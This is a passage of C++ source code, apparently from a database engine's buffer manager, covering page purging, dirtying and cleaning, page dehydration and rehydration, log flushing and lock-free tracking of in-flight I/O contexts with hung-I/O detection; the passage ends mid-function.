// Purges a page and all its versions from the cache, including the current version.
// The page passed in must be the current version and must already be marked abandoned.
void BFIPurgeAllPageVersions( _Inout_ BFLatch* const pbfl, const TraceContext& tc )
{
PBF pbf = PbfBFILatchContext( pbfl->dwContext );
Assert( FBFIOwnsLatchType( pbf, bfltWrite ) );
OnDebug( const IFMP ifmp = pbf->ifmp );
OnDebug( const PGNO pgno = pbf->pgno );
EnforceSz( pbf->fAbandoned, "PurgeAllInitNotAbandoned" );
EnforceSz( pbf->fCurrentVersion, "PurgeAllInitNotCurrent" );
EnforceSz( !pbf->fOlderVersion, "PurgeAllInitOlder" );
// First, we're going to latch all versions and mark them as abandoned.
// This technically isn't required because we're going to properly purge
// one-by-one down below, but since we have asserts, enforces and protection
// against latching and writing abandoned pages, we're going to flag them all
// so that they trigger those protections if someone tries to latch or write
// them out.
g_critBFDepend.Enter();
for ( PBF pbfAbandon = pbf->pbfTimeDepChainNext; pbfAbandon != pbfNil; )
{
if ( pbfAbandon->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( !pbfAbandon->fAbandoned )
{
pbfAbandon->sxwl.UpgradeExclusiveLatchToWriteLatch();
pbfAbandon->fAbandoned = fTrue;
pbfAbandon->sxwl.ReleaseWriteLatch();
}
else
{
pbfAbandon->sxwl.ReleaseExclusiveLatch();
}
// Next in the chain.
pbfAbandon = pbfAbandon->pbfTimeDepChainNext;
}
else
{
// Avoid deadlocks.
g_critBFDepend.Leave();
UtilSleep( dtickFastRetry );
g_critBFDepend.Enter();
// Reset enumeration because we left the g_critBFDepend for an instant.
pbfAbandon = pbf->pbfTimeDepChainNext;
}
}
g_critBFDepend.Leave();
// Loop until we have evicted all versions.
while ( fTrue )
{
EnforceSz( pbf->fAbandoned, "PurgeAllCurNotAbandoned" );
EnforceSz( pbf->fCurrentVersion, "PurgeAllCurNotCurrent" );
EnforceSz( !pbf->fOlderVersion, "PurgeAllCurOlder" );
g_critBFDepend.Enter();
if ( pbf->pbfTimeDepChainNext != pbfNil )
{
// Find the oldest version to purge.
BF* pbfVersion = PbfBFIGetFlushOrderLeaf( pbf, fFalse );
Assert( ( pbfVersion != pbfNil ) && ( pbfVersion != pbf ) );
const BOOL fVersionLatched = pbfVersion->sxwl.ErrTryAcquireWriteLatch() == CSXWLatch::ERR::errSuccess;
g_critBFDepend.Leave();
if ( fVersionLatched )
{
EnforceSz( pbfVersion->fAbandoned, "PurgeAllVerNotAbandoned" );
EnforceSz( !pbfVersion->fCurrentVersion, "PurgeAllVerCurrent" );
EnforceSz( pbfVersion->fOlderVersion, "PurgeAllVerNotOlder" );
BFIPurgePage( pbfVersion, pbfVersion->ifmp, pbfVersion->pgno, bfltWrite, BFEvictFlags( bfefReasonPurgePage | bfefEvictDirty ) );
pbfVersion = pbfNil;
}
}
else
{
g_critBFDepend.Leave();
}
g_critBFDepend.Enter();
if ( pbf->pbfTimeDepChainNext == pbfNil )
{
g_critBFDepend.Leave();
BFIPurgePage( pbf, pbf->ifmp, pbf->pgno, bfltWrite, BFEvictFlags( bfefReasonPurgePage | bfefEvictDirty ) );
pbf = pbfNil;
break;
}
else
{
g_critBFDepend.Leave();
}
}
pbfl->pv = NULL;
pbfl->dwContext = NULL;
}
// Purges the current abandoned page version of a new page. The buffer passed in must be the
// current version and must be abandoned. It will be purged and not written out, even if
// dirty. It was designed to purge dirty new pages upon failure to complete the original
// operation which new'd the page in the first place, so we don't end up with a page in
// the database with a logged checksum and dbtime which will mismatch the page on the
// passive side on replicated systems, therefore causing DB divergence to flag the discrepancy.
void BFIPurgeNewPage( _Inout_ const PBF pbf, const TraceContext& tc )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
EnforceSz( pbf->fAbandoned, "PurgeAbandonedVerNotAbandoned" );
EnforceSz( pbf->fCurrentVersion, "PurgeAbandonedVerNotCurrent" );
EnforceSz( !pbf->fOlderVersion, "PurgeAbandonedVerOlder" );
g_critBFDepend.Enter();
EnforceSz( ( pbf->pbfTimeDepChainNext == pbfNil ) &&
( pbf->pbfTimeDepChainPrev == pbfNil ), "PurgeAbandonedVerTooManyVersions" );
g_critBFDepend.Leave();
OnDebug( const IFMP ifmp = pbf->ifmp );
OnDebug( const PGNO pgno = pbf->pgno );
BFIPurgePage( pbf, pbf->ifmp, pbf->pgno, bfltWrite, BFEvictFlags( bfefReasonPurgePage | bfefEvictDirty ) );
Assert( !FBFInCache( ifmp, pgno ) );
}
// Purges a page from the cache. The latch is always released.
void BFIPurgePage(
_Inout_ const PBF pbf,
_In_ const IFMP ifmpCheck,
_In_ const PGNO pgnoCheck,
_In_ const BFLatchType bfltHave,
_In_ const BFEvictFlags bfefDangerousOptions )
{
Assert( ( bfltHave == bfltMax ) || ( bfltHave == bfltWrite ) );
Assert( ( bfltHave == bfltMax ) || pbf->sxwl.FOwnWriteLatch() );
Assert( ( bfltHave == bfltMax ) || ( ( pbf->ifmp == ifmpCheck ) && ( pbf->pgno == pgnoCheck ) ) );
Assert( ( bfefDangerousOptions & bfefEvictDirty ) != 0 );
BOOL fLatched = ( bfltHave != bfltMax );
const BOOL fAllowTearDownClean = ( 0 != ( bfefDangerousOptions & bfefAllowTearDownClean ) );
while ( fTrue )
{
// Check if page changed under us. We must not require a latch to check because the page might be in a
// condition that will never give up the latch (e.g., page is in the avail pool).
if ( ( pbf->ifmp != ifmpCheck ) || ( pbf->pgno != pgnoCheck ) )
{
break;
}
if ( !fLatched )
{
// It's safe to de-reference the unlatched pbf here because we never de-allocate the BF array,
// except for when we are terminating the buffer manager.
const CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireWriteLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
fLatched = fTrue;
}
else
{
Assert( errSXWL == CSXWLatch::ERR::errLatchConflict );
UtilSleep( dtickFastRetry );
continue;
}
}
// Check if page changed under us now that we have the latch.
if ( ( pbf->ifmp != ifmpCheck ) || ( pbf->pgno != pgnoCheck ) )
{
break;
}
if ( pbf->err == wrnBFPageFlushPending &&
ErrBFIWriteSignalState( pbf ) == wrnBFPageFlushPending )
{
// The IO thread hasn't signaled the IO completed yet.
BFIReleaseSXWL( pbf, bfltWrite );
fLatched = fFalse;
UtilSleep( dtickFastRetry );
continue;
}
Assert( pbf->err != wrnBFPageFlushPending ||
ErrBFIWriteSignalState( pbf ) != wrnBFPageFlushPending ); // all IO should be complete ...
// Complete the flush if necessary ...
if ( pbf->err == wrnBFPageFlushPending &&
!FBFICompleteFlushPage( pbf, bfltWrite, fFalse, fFalse, fAllowTearDownClean ) )
{
AssertSz( fFalse, "In BFPurge() couldn't, complete write IO!" );
}
Assert( FBFIUpdatablePage( pbf ) );
// cancel any pending patch requests
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing ) )
{
Assert( FBFIOwnsLatchType( pbf, bfltExclusive ) || FBFIOwnsLatchType( pbf, bfltWrite ) );
PagePatching::CancelPatchRequest( pbf->ifmp, pbf->pgno );
}
// lock this BF in the LRUK in preparation for a possible eviction
BFLRUK::CLock lockLRUK;
g_bflruk.LockResourceForEvict( pbf, &lockLRUK );
// mark this BF as "newly evicted" so that when it is actually evicted
// we will mark it as not "newly evicted". this will make it so that
// purged pages do not cause cache growth when they are reused
pbf->fNewlyEvicted = fTrue;
// release our latch. we do not have to worry about
// the page being evicted because we have the LRUK locked
BFIReleaseSXWL( pbf, bfltWrite );
fLatched = fFalse;
// try to evict this page
const ERR errEvict = ErrBFIEvictPage( pbf, &lockLRUK, bfefDangerousOptions );
// unlock the LRUK
g_bflruk.UnlockResourceForEvict( &lockLRUK );
// we failed to evict this page
if ( errEvict < JET_errSuccess )
{
ExpectedSz( errEvict == errBFIPageDirty ||
errEvict == errBFIPageFlushPending ||
errEvict == errBFIPageFlushPendingSlowIO ||
errEvict == errBFIPageFlushPendingHungIO ||
errEvict == errBFIPageFaultPending ||
errEvict == errBFIPageFaultPendingHungIO ||
errEvict == errBFLatchConflict, "Unknown errEvict=%d.", errEvict );
UtilSleep( dtickFastRetry );
continue;
}
else
{
break;
}
}
if ( fLatched )
{
BFIReleaseSXWL( pbf, bfltWrite );
fLatched = fFalse;
}
}
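// Renounces interest in the given Write Latched page. If the page is clean (or
// fRenounceDirty is set and there are no older versions), it is marked clean so
// that its contents will never be flushed; the actual eviction is left to the
// clean thread, which is more scalable than freeing the buffer here.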
void BFIRenouncePage( _Inout_ PBF pbf, _In_ const BOOL fRenounceDirty )
{
// validate IN args
Assert( pbf->sxwl.FOwnWriteLatch() );
// the BF is not undergoing write-IO ...
Enforce( pbf->err != errBFIPageFaultPending );
Enforce( pbf->err != wrnBFPageFlushPending );
Enforce( pbf->pWriteSignalComplete == NULL );
// the BF is clean or we can renounce dirty BFs (unless there are older versions)
if ( ( pbf->bfdf == bfdfClean ) ||
( fRenounceDirty && pbfNil == pbf->pbfTimeDepChainNext ) )
{
if ( fRenounceDirty )
{
Assert( !FBFIDatabasePage( pbf ) );
}
if ( JET_errSuccess <= ErrBFIEvictRemoveCleanVersions( pbf ) )
{
// just mark this BF as clean to prevent any data from being flushed.
// we will allow the clean thread to evict it later. this will delay
// freeing the BF but will be more scalable
Enforce( pbf->pbfTimeDepChainPrev == NULL );
Enforce( pbf->pbfTimeDepChainNext == NULL );
BFICleanPage( pbf, bfltWrite );
}
}
// mark this BF as "newly evicted" so that when it is actually evicted
// we will mark it as not "newly evicted". this will make it so that
// renounced pages do not cause cache growth when they are reused
pbf->fNewlyEvicted = fTrue;
}
const CHAR mpbfdfsz[ bfdfMax - bfdfMin ][ 16 ] =
{
"bfdfClean",
"bfdfUntidy",
"bfdfDirty",
"bfdfFilthy",
};
C_ASSERT( _countof( mpbfdfsz ) == bfdfFilthy + 1 );
C_ASSERT( _countof( mpbfdfsz ) == bfdfMax );
// Marks the given WAR Latched or Write Latched page as dirty. This means
// that the given buffer for this page contains changes that should be written
// to disk. The degree of dirtiness is specified by the given dirty flags.
// A page can only be made more dirty. Trying to make a page less dirty than
// it currently is will have no effect.
void BFIDirtyPage( PBF pbf, BFDirtyFlags bfdf, const TraceContext& tc )
{
Assert( bfdfClean < bfdf ); // don't just call us for fun
Assert( !g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach ); // don't dirty page on R/O DB
// the BF is clean
if ( pbf->bfdf == bfdfClean )
{
// reset the BF's lgposOldestBegin0
//
// NOTE: we usually do this during Idle Flush or Checkpoint
// Advancement. However, we must do this on DirtyPage to handle the
// case where a BF has been written out, its lgposOldestBegin0 hasn't
// been reset, and then the BF is dirtied again with a more recent
// lgposOldestBegin0. if we didn't do this then a frequently dirtied
// page could impede the checkpoint indefinitely
BFIResetLgposOldestBegin0( pbf );
// reset the error state of the BF
//
// NOTE: this is to handle the case where we want to modify a page
// that was latched with bflfNoFaultFail. we want a chance to write our
// changes to the page
pbf->err = JET_errSuccess;
}
// keep track of dirties on this thread
if ( bfdf <= bfdfUntidy )
{
if ( pbf->bfdf < bfdfUntidy )
{
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "Untidied page=[0x%x:0x%x], tcd=%d", (ULONG)pbf->ifmp, pbf->pgno, pbf->tce ) );
}
}
else if ( bfdf >= bfdfDirty )
{
// note: we don't track untidies in "dirty" stats, because they are not real dirties.
// Trace that we intended to dirty the page
BFITraceDirtyPage( pbf, bfdf, tc );
Assert( pbf->pgno <= g_rgfmp[pbf->ifmp].PgnoLast() ||
g_rgfmp[pbf->ifmp].FBeyondPgnoShrinkTarget( pbf->pgno ) ||
g_rgfmp[pbf->ifmp].FOlderDemandExtendDb() );
g_rgfmp[pbf->ifmp].UpdatePgnoDirtiedMax( pbf->pgno );
TLS* const ptls = Ptls();
if ( pbf->bfdf < bfdfDirty )
{
// note: we count untidy as clean, as the user probably didn't do anything
// to make the page untidy.
ptls->threadstats.cPageDirtied++;
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManagerBufferDirtyState,
OSFormat( "Dirtied page=[0x%x:0x%x] from %hs, tce=%d", (ULONG)pbf->ifmp, pbf->pgno, mpbfdfsz[ pbf->bfdf ], pbf->tce ) );
PERFOpt( cBFDirtied.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
ptls->threadstats.cPageRedirtied++;
// "Filthied" will only be logged once on transition from dirty to filthy. "Re-dirtied" covers re-filthied here (but its not an important state change).
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "%hs page=[0x%x:0x%x], tce=%d", ( bfdf == bfdfDirty && pbf->bfdf == bfdfDirty ) ? "Re-dirtied" : "Filthied", (ULONG)pbf->ifmp, pbf->pgno, pbf->tce ) );
PERFOpt( cBFDirtiedRepeatedly.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
// track unique modified pages
const TICK tickLastDirtiedBefore = pbf->tickLastDirtied;
const TICK tickLastDirtiedAfter = pbf->tickLastDirtied = TickOSTimeCurrent();
Assert( TickCmp( tickLastDirtiedAfter, tickLastDirtiedBefore ) >= 0 );
const BOOL fUpdateThreadStats = ( TickCmp( tickLastDirtiedBefore, ptls->TickThreadStatsLast() ) <= 0 );
if ( fUpdateThreadStats )
{
ptls->threadstats.cPageUniqueModified++;
}
}
Enforce( pbf->pbfTimeDepChainPrev == NULL );
// make this BF dirtier
if ( pbf->bfdf < bfdfDirty && bfdf >= bfdfDirty )
{
AtomicDecrement( (LONG*)&g_cbfCacheClean );
}
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
if ( ( bfdf >= bfdfDirty ) && BoolParam( JET_paramEnableFileCache ) && pbf->fCurrentVersion )
{
Expected( !pbf->fOlderVersion );
BFITouchResource( pbf, bfltExclusive, bflfDefault, fTrue, g_pctCachePriorityNeutral, tc );
}
pbf->bfdf = BYTE( max( pbf->bfdf, bfdf ) );
Assert( pbf->bfdf == max( pbf->bfdf, bfdf ) );
}
// Between two clean pages (or dirty pages if fTearDownFMP is set) this is essentially
// the logical inverse of ErrBFIVersionPage / aka it "unversions a page".
void BFICleanVersion( PBF pbf, BOOL fTearDownFMP )
{
Assert( g_critBFDepend.FOwner() );
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
// remove every BF above us and ourself from the time dependency chain
//
// NOTE: we should not be dependent on anyone else if we were flushed.
// the generality of this code is aimed at handling the purging of BFs
// that are in an error state before crashing the system and forcing a
// recovery due to an I/O error on the database or log files
Assert( !pbf->fOlderVersion || !pbf->fCurrentVersion );
if ( pbf->pbfTimeDepChainPrev != pbfNil ||
pbf->pbfTimeDepChainNext != pbfNil ||
pbf->bfbitfield.FDependentPurged() )
{
Enforce( pbf->pbfTimeDepChainNext == NULL || fTearDownFMP );
while ( pbf->pbfTimeDepChainPrev != pbfNil ||
pbf->pbfTimeDepChainNext != pbfNil )
{
// find a leaf of our branch in the time dependency chain
PBF pbfT = pbf;
while ( pbfT->pbfTimeDepChainNext != pbfNil )
{
pbfT = pbfT->pbfTimeDepChainNext;
Assert( pbfT->ifmp == pbf->ifmp ); // no cross-database dependencies allowed
}
// if this BF is part of a time dependency chain, remove it
if ( pbfT->pbfTimeDepChainPrev != pbfNil )
{
BF * const pbfDepT = pbfT->pbfTimeDepChainPrev;
pbfDepT->bfbitfield.SetFDependentPurged( pbfDepT->bfbitfield.FDependentPurged() || ( wrnBFPageFlushPending != pbf->err ) );
pbfDepT->pbfTimeDepChainNext = pbfNil;
pbfT->pbfTimeDepChainPrev = pbfNil;
Enforce( pbfT->pbfTimeDepChainNext == NULL ); // do not orphan ...
}
}
pbf->bfbitfield.SetFDependentPurged( fFalse );
// This BF is now clean, we can say it is not impeding the checkpoint
pbf->bfbitfield.SetFImpedingCheckpoint( fFalse );
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
}
}
// cleans a page in the buffer manager
void BFICleanPage( __inout PBF pbf, __in const BFLatchType bfltHave, __in const BFCleanFlags bfcf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
// we should only use this if we are purging a dirty context due to
// resource tear down.
const BOOL fTearDown = bfcfAllowTearDownClean & bfcf;
Enforce( pbf->err != errBFIPageFaultPending ); // should be true
//Enforce( pbf->err != wrnBFPageFlushPending ); // not true.
Enforce( pbf->pWriteSignalComplete == NULL ); // true because we reset the signal before BFICleanPage.
Enforce( PvBFIAcquireIOContext( pbf ) == NULL );
// remove every BF above us and ourself from the time dependency chain
//
if ( pbf->pbfTimeDepChainPrev != pbfNil ||
pbf->pbfTimeDepChainNext != pbfNil ||
pbf->bfbitfield.FDependentPurged() )
{
g_critBFDepend.Enter();
Enforce( pbf->pbfTimeDepChainNext == NULL || fTearDown );
BFICleanVersion( pbf, fTearDown );
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
g_critBFDepend.Leave();
}
// even if we weren't involved in a time dependency chain, reset the checkpoint-impeding flag
if ( pbf->bfbitfield.FImpedingCheckpoint() )
{
g_critBFDepend.Enter();
pbf->bfbitfield.SetFImpedingCheckpoint( fFalse );
g_critBFDepend.Leave();
}
Enforce( pbf->pbfTimeDepChainNext == NULL );
Enforce( pbf->pbfTimeDepChainPrev == NULL );
// remove all undo info
if ( pbf->prceUndoInfoNext != prceNil )
{
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbf ) );
Assert( fTearDown );
while ( pbf->prceUndoInfoNext != prceNil )
{
BFIRemoveUndoInfo( pbf, pbf->prceUndoInfoNext );
}
}
// reset our lgposModify
BFIResetLgposModify( pbf );
pbf->rbsposSnapshot = rbsposMin;
// do NOT reset our lgposOldestBegin0
//
// NOTE: we usually do this during Idle Flush or Checkpoint
// Advancement. We must NOT reset this here because doing so could cause
// the I/O thread to deadlock with the Idle Flush or Checkpoint Advancement
// threads when it is processing a write completion. This deadlock only
// occurs because the I/O manager will block a thread attempting to issue
// an I/O when it has run out of IOREQs which, in turn, can only be
// replenished by the I/O thread
//
// HOWEVER: do request checkpoint depth maintenance to remove our entry
// from the OB0 index. we must do this so that the checkpoint will be
// properly updated if we go to a 100% clean cache for a given database
//BFIResetLgposOldestBegin0( pbf );
FMP* pfmp = &g_rgfmp[ pbf->ifmp ];
if ( CmpLgpos( pbf->lgposOldestBegin0, lgposMax ) )
{
BFIMaintCheckpointDepthRequest( pfmp, bfcpdmrRequestRemoveCleanEntries );
BFIMaintCheckpointRequest();
}
// reset our I/O error status
if ( pbf->ifmp != ifmpNil && // BF is holding a valid database page
PinstFromIfmp( pbf->ifmp ) ) // BF is holding a database page for an active instance
// (not retaining a page for a non-attached database)
{
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
pbf->err = JET_errSuccess;
// update our page write stats
if ( pbf->fFlushed )
{
pbf->fFlushed = fFalse;
}
pbf->fLazyIO = fFalse;
pbf->fSuspiciouslySlowRead = fFalse;
// make this BF clean (do this after removing ourself from the dependency
// tree to avoid asserting)
if ( pbf->bfdf >= bfdfDirty )
{
AtomicIncrement( (LONG*)&g_cbfCacheClean );
}
OSTraceFMP( pbf->ifmp, JET_tracetagBufferManagerBufferDirtyState,
OSFormat( "Cleaned page=[0x%x:0x%x] from %hs, tce=%d",
(ULONG)pbf->ifmp,
pbf->pgno,
mpbfdfsz[ pbf->bfdf ],
pbf->tce ) );
pbf->bfdf = bfdfClean;
// to save space, try to dehydrate the page if appropriate
if ( !fTearDown && // we're about to purge / evict this page
pbf->fCurrentVersion // older versions will be evicted fast, no need to compress
)
{
// we need the w-latch if we don't already have it
CSXWLatch::ERR errSXWL = CSXWLatch::ERR::errSuccess;
if ( bfltExclusive == bfltHave )
{
errSXWL = pbf->sxwl.ErrTryUpgradeExclusiveLatchToWriteLatch();
}
if ( CSXWLatch::ERR::errSuccess == errSXWL )
{
// dehydrate the page
BFIDehydratePage( pbf, bfcf & bfcfAllowReorganization );
if ( bfltExclusive == bfltHave )
{
// return ourselves to the previous latch state
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
}
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
}
// buffer hydration management
// this function dehydrates the page to the smallest size supported by the database engine / CPAGE.
void BFIDehydratePage( PBF pbf, __in const BOOL fAllowReorg )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// this protection is too strong, due to page patching code paths ...
// page patching calls ErrBFWriteLatch() with bflfNoFaultFail, which allows the API
// to succeed and return a page that is -1018 and write latched ... on unlatch
// we try to dehydrate and hit this code path with an err'd BF.
if ( pbf->err < JET_errSuccess )
{
// err'd BFs are not valid for dehydration
return;
}
if ( FBFICacheViewCacheDerefIo( pbf ) )
{
// just don't want to think about this...
return;
}
if ( !FBFIDatabasePage( pbf ) )
{
// We don't know how to dehydrate such pages yet, maybe someday.
return;
}
if ( pbf->bfdf > bfdfUntidy )
{
// For now, we only allow clean/untidy pages to be dehydrated
return;
}
if ( pbf->icbBuffer < icbPage4KB )
{
// For now, we can't handle 2KB pages
Assert( pbf->icbPage == icbPage2KB );
Assert( pbf->icbBuffer == icbPage2KB );
return;
}
// First we need to create a BFLatch that cpage thinks is real via rebuffering ...
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpage;
cpage.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// Is the page dehydratable ...
ULONG cbMinReqSize;
if ( cpage.FPageIsDehydratable( &cbMinReqSize, fAllowReorg ) )
{
// get the min required size of the page
ICBPage icbNewSize = max( icbPage4KB, IcbBFIBufferSize( cbMinReqSize ) );
Assert( cbMinReqSize <= (ULONG)g_rgcbPageSize[icbNewSize] );
if ( icbNewSize != pbf->icbBuffer )
{
// Do dehydration
OSTrace( JET_tracetagBufferManager, OSFormat( "Dehydrating Page %d:%d to %d bytes.\n", (ULONG)pbf->ifmp, pbf->pgno, g_rgcbPageSize[icbNewSize] ) );
cpage.DehydratePage( g_rgcbPageSize[icbNewSize], fAllowReorg );
PERFOpt( cBFPagesDehydrated.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// not needed because there would be a latch associated with this
// ErrBFIMaintCacheStatsRequest( bfmcsrtNormal );
Assert( pbf->icbBuffer == icbNewSize );
}
}
}
// this function rehydrates a page to full size
void BFIRehydratePage( PBF pbf )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->icbBuffer != icbPage0 ); // re-hydration from zero comes from unquiescing buffers and should go
// through ErrBFISetBufferSize() when the page gets pulled from the avail pool.
if ( pbf->icbBuffer == pbf->icbPage )
{
// Yeah, we're done rehydrating already.
return;
}
// we should not have dehydrated a page for view cache.
Assert( !BoolParam( JET_paramEnableViewCache ) );
// non-DB pages shouldn't have been dehydrated
Assert( FBFIDatabasePage( pbf ) );
// First we need to create a BFLatch that cpage thinks is real via rebuffering ...
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpage;
cpage.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// Do rehydration
OSTrace( JET_tracetagBufferManager, OSFormat( "Rehydrating Page %d:%d from %d bytes.\n", (ULONG)pbf->ifmp, pbf->pgno, g_rgcbPageSize[pbf->icbBuffer] ) );
cpage.RehydratePage();
PERFOpt( cBFPagesRehydrated.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// not needed because there would be a latch associated with this
// ErrBFIMaintCacheStatsRequest( bfmcsrtNormal );
// Validate success
Assert( pbf->icbBuffer == pbf->icbPage );
}
// Log I/O / Flush
// this function writes the log
ERR ErrBFIWriteLog( __in const IFMP ifmp, __in const BOOL fSync )
{
PIB pibFake;
pibFake.m_pinst = PinstFromIfmp( ifmp );
if ( fSync )
{
return ErrLGWaitForWrite( &pibFake, &lgposMax );
}
// else ...
return ErrLGWrite( &pibFake );
}
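// this function flushes the log file buffers for the instance owning the given database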
ERR ErrBFIFlushLog( __in const IFMP ifmp, __in const IOFLUSHREASON iofr, const BOOL fMayOwnBFLatch )
{
return ErrLGFlush( PinstFromIfmp( ifmp )->m_plog, iofr, fMayOwnBFLatch );
}
// I/O
const void* const PV_IO_CTX_LOCK = (void*)upMax;
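// pbf->pvIOContext tracks the I/O (if any) currently outstanding against a BF.
// Access is coordinated without a latch by temporarily swapping in the
// PV_IO_CTX_LOCK sentinel while a reader inspects the context. A typical caller
// (see FBFIIsIOHung() below) follows this sketch:
//
//      void* const pvIOContext = PvBFIAcquireIOContext( pbf );
//      if ( pvIOContext != NULL )
//      {
//          // ... interrogate the in-flight I/O, e.g. PctBFIIsIOHung( pbf, pvIOContext ) ...
//          BFIReleaseIOContext( pbf, pvIOContext );
//      }
//
// BFISetIOContext() / BFIResetIOContext() bracket the lifetime of the I/O itself.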
void* PvBFIAcquireIOContext( PBF pbf )
{
void* pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
OSSYNC_FOREVER
{
// NULL context, no I/O currently happening, bail without locking and don't return any I/O context.
if ( pvIOContextOld == NULL )
{
return NULL;
}
// Locked, try again.
if ( pvIOContextOld == PV_IO_CTX_LOCK )
{
UtilSleep( 1 );
pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
continue;
}
// Try to lock the context.
void* const pvIOContextOldReplaced = AtomicCompareExchangePointer( &pbf->pvIOContext, pvIOContextOld, (void*)PV_IO_CTX_LOCK );
// Something changed on us.
if ( pvIOContextOldReplaced != pvIOContextOld )
{
pvIOContextOld = pvIOContextOldReplaced;
continue;
}
// Success.
Assert( AtomicReadPointer( &pbf->pvIOContext ) == PV_IO_CTX_LOCK );
Assert( ( pvIOContextOldReplaced != NULL ) && ( pvIOContextOldReplaced != PV_IO_CTX_LOCK ) );
return pvIOContextOldReplaced;
}
}
void BFIReleaseIOContext( PBF pbf, void* const pvIOContext )
{
Assert( pvIOContext != PV_IO_CTX_LOCK );
Expected( pvIOContext != NULL );
OnDebug( void* const pvIOContextOld = ) AtomicExchangePointer( &pbf->pvIOContext, pvIOContext );
Assert( pvIOContextOld == PV_IO_CTX_LOCK );
}
void BFISetIOContext( PBF pbf, void* const pvIOContextNew )
{
Assert( pvIOContextNew != PV_IO_CTX_LOCK );
Expected( pvIOContextNew != NULL );
OnDebug( void* const pvIOContextOld = ) AtomicExchangePointer( &pbf->pvIOContext, pvIOContextNew );
Assert( pvIOContextOld == NULL );
}
void BFIResetIOContext( PBF pbf )
{
void* pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
OSSYNC_FOREVER
{
Expected( pvIOContextOld != NULL );
// NULL context, bail.
if ( pvIOContextOld == NULL )
{
return;
}
// Locked, try again.
if ( pvIOContextOld == PV_IO_CTX_LOCK )
{
UtilSleep( 1 );
pvIOContextOld = AtomicReadPointer( &pbf->pvIOContext );
continue;
}
void* const pvIOContextOldReplaced = AtomicCompareExchangePointer( &pbf->pvIOContext, pvIOContextOld, NULL );
// Something changed on us, try again.
if ( pvIOContextOldReplaced != pvIOContextOld )
{
pvIOContextOld = pvIOContextOldReplaced;
continue;
}
// Success.
Assert( ( pvIOContextOldReplaced != NULL ) && ( pvIOContextOldReplaced != PV_IO_CTX_LOCK ) );
return;
}
}
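// returns fTrue if the I/O currently outstanding against this BF has been pending
// for at least the hung-I/O threshold (JET_paramHungIOThreshold)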
BOOL FBFIIsIOHung( PBF pbf )
{
void* const pvIOContext = PvBFIAcquireIOContext( pbf );
if ( pvIOContext == NULL )
{
return fFalse;
}
const BOOL fHung = ( PctBFIIsIOHung( pbf, pvIOContext ) >= 100 );
BFIReleaseIOContext( pbf, pvIOContext );
return fHung;
}
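// returns how far along the outstanding I/O is toward the hung-I/O threshold,
// expressed as a percentage and capped at 100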
BYTE PctBFIIsIOHung( PBF pbf, void* const pvIOContext )
{
IFileAPI* const pfapi = g_rgfmp[ pbf->ifmp ].Pfapi();
const TICK dtickIOElapsed = pfapi->DtickIOElapsed( pvIOContext );
const TICK dtickHungIO = (TICK)UlParam( JET_paramHungIOThreshold );
if ( dtickIOElapsed >= dtickHungIO )
{
return 100;
}
else
{
return (BYTE)( ( (QWORD)dtickIOElapsed * 100 ) / dtickHungIO );
}
}
ERR ErrBFIFlushPendingStatus( PBF pbf )
{
ERR err = JET_errSuccess;
// WARNING: this function must always return one of the errBFIPageFlushPending*
// errors, even in cases where the acquired pvIOContext is NULL, which would indicate
// that the I/O is not pending anymore. That is because this function is consumed
// in places where the detemination that the I/O is pending has already been made and
// there are no sufficient locks held to ensure that the I/O has not transitioned to
// a completed state, so we better not change the decision that has been made in upper
// layers.
void* const pvIOContext = PvBFIAcquireIOContext( pbf );
if ( pvIOContext == NULL )
{
Error( ErrERRCheck( errBFIPageFlushPending ) );
}
const BYTE pctIOLatencyToHung = PctBFIIsIOHung( pbf, pvIOContext );
Expected( pctIOLatencyToHung <= 100 );
BFIReleaseIOContext( pbf, pvIOContext );
// Over 100% of the hung threshold, it's definitely hung.
if ( pctIOLatencyToHung >= 100 )
{
Error( ErrERRCheck( errBFIPageFlushPendingHungIO ) );
}
// Over 2% of the hung threshold, consider it slow.
if ( pctIOLatencyToHung >= 2 )
{
Error( ErrERRCheck( errBFIPageFlushPendingSlowIO ) );
}
err = ErrERRCheck( errBFIPageFlushPending );
HandleError:
Assert( ( err == errBFIPageFlushPending ) ||
( err == errBFIPageFlushPendingSlowIO ) ||
